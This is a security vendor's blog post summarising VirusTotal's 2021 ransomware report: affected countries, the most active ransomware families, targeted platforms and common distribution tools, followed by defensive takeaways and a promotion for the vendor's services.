Categories Blog VirusTotal’s Analysis of 80 Million Ransomware Samples Reveals the Current State of Cybersecurity Landscape Post author By Vinith Sengunthar Post date October 20, 2021 No Comments on VirusTotal’s Analysis of 80 Million Ransomware Samples Reveals the Current State of Cybersecurity Landscape Home » Blog » VirusTotal’s Analysis of 80 Million Ransomware Samples Reveals the Current State of Cybersecurity Landscape VirusTotal’s Analysis of 80 Million Ransomware Samples Reveals the Current State of Cybersecurity Landscape After analyzing around 80 million ransomware samples submitted by suspicious users across 140 countries since 2020, VirusTotal shared its first ransomware report. The report reveals that about 130 ransomware families have been found active during 2020 and the first half of 2021. Based on the analysis of daily submissions, it is found that the volume of attacks was the most during the first two quarters of 2020 when the Covid-19 pandemic was at its peak. Israel is the most affected geography with an almost 600% increase based on the submissions compared to the previous baselines. The other most affected countries following Israel are South Korea, Vietnam, China, Singapore, and India. Source: https://storage.googleapis.com/vtpublic/vt-ransomware-report-2021.pdf The peak in the attacks is mostly attributed to the GrandCab family, who emerged to be the most active family with around 78.5% of samples under its name. Another peak in activity was seen during July 2021, which the Babuk ransomware family drove. Following GandCrab were Babuk, Cerber, Matsnu, and Wannacry with 7.61%, 3.11%, 2.63%, and 2.41%, respectively. Here’s a pie chart showing the top 10 most active Source: https://storage.googleapis.com/vtpublic/vt-ransomware-report-2021.pdf Although these 10 ransomware families topped the list, the report found a total of 130 different families active. Interestingly, while the bigger ransomware campaigns come and go, several smaller ones are constantly active throughout the analysis period. The study also found that Windows remains the most targeted system as around 95% of the samples were Windows executables or dynamic link libraries (DLLs). Android was the second most targeted system with 2.09% Android-based samples. Source: https://storage.googleapis.com/vtpublic/vt-ransomware-report-2021.pdf Although there were numerous ransomware attempts made, only 5% of the samples were associated with exploits. However, this does make sense as ransomware is usually deployed using social engineering or droppers. Based on this 5% of samples, a few common artifacts used for malware distribution and lateral movement were identified. Topping the list of artifacts were Emotet, Zbot, Dridex, Gozi, and Danabot. Some other artifacts identified were Mimikatz and Cobaltstrike; scripting languages such as AutoIT and Powershell; and remote access Trojans (RATs), such as Phorpiex, Smokeloader, Nanocore, and Ponystealer. Some other key findings from the report include: Although a few big campaigns used some sort of existing samples, fresh samples are prepared by the attackers in most cases. Besides a few spikes that come and go, there’s always a baseline activity by small campaigns. Exploits were usually used only for privilege escalation and lateral movement within the network. The attackers took a range of different and innovative approaches to penetrate systems. Final Thoughts Constantly rising ransomware activities hints that organizations worldwide are under the possibility of an attack. Hence, the report also highlights a few takeaways to build an effective anti-ransomware strategy. Efficient malware-distribution detection systems Patching strategy prioritization for Windows privilege escalation vulnerabilities Increasing the strength and efficiency of scripting languages and lateral movement tools Monitoring worldwide ransomware activities regularly and updating the security strategies accordingly Always have resilience and recovery strategies in place in case the detection fails You can seek assistance from a comprehensive cybersecurity service provider’s tools such as SharkStriker’s XDR to ensure top-notch detection, mitigation, prevention, and recovery. Such tools and services can help you monitor your IT infrastructure 24/7 and leverage machine-accelerated threat hunting for better resiliency. Also, Read Activities From Conti Ransomware Surges and Draws US Authorities’ Attention who Issues Fresh Alerts SearchSearch Recent Post SharkStriker Wins the “SIEM Innovation of the Year” award at the 7th CyberSecurity Breakthrough awardOctober 6, 2023 SharkStriker joins the league of the world’s Top 250 MSSPs, again! September 27, 2023 STRIEGO by SharkStriker: A holistic cybersecurity platform launched September 20, 2023 SharkStriker launches a data center in South AfricaAugust 31, 2023 Russian APT group Midnight Blizzard targets more than 40 companies globally using Microsoft TeamsAugust 16, 2023 On-Demand Webinars Know which cyber insurance will fetch you the maximum ROI for your business.July 19, 2023 Charter business growth in cybersecurity services market in 2023May 19, 2023 Live Attack Simulation: Exploring Microsoft Exchange from a Hacker’s POVApril 21, 2023 Affordable enterprise security for SMBsMarch 10, 2023 Turbocharging solutions through cybersecurity -as-a-service USAFebruary 13, 2023 MDR Complete Visibility, Continuous Monitoring& Advanced Threat Protection withAI-backed Incident Remediation. Read More > Latest Post AllBlog Load More Blog Webinar News Guides Videos Data Sheet Services ← How to Select the Best XDR Solution for a Comprehensive Cybersecurity → Cyber Protect LLC Joins Hands with SharkStriker to Leverage Their White-Labeled Cybersecurity Services Leave a Reply Cancel replyYour email address will not be published. Required fields are marked *Comment * Name * Email * Website Save my name, email, and website in this browser for the next time I comment.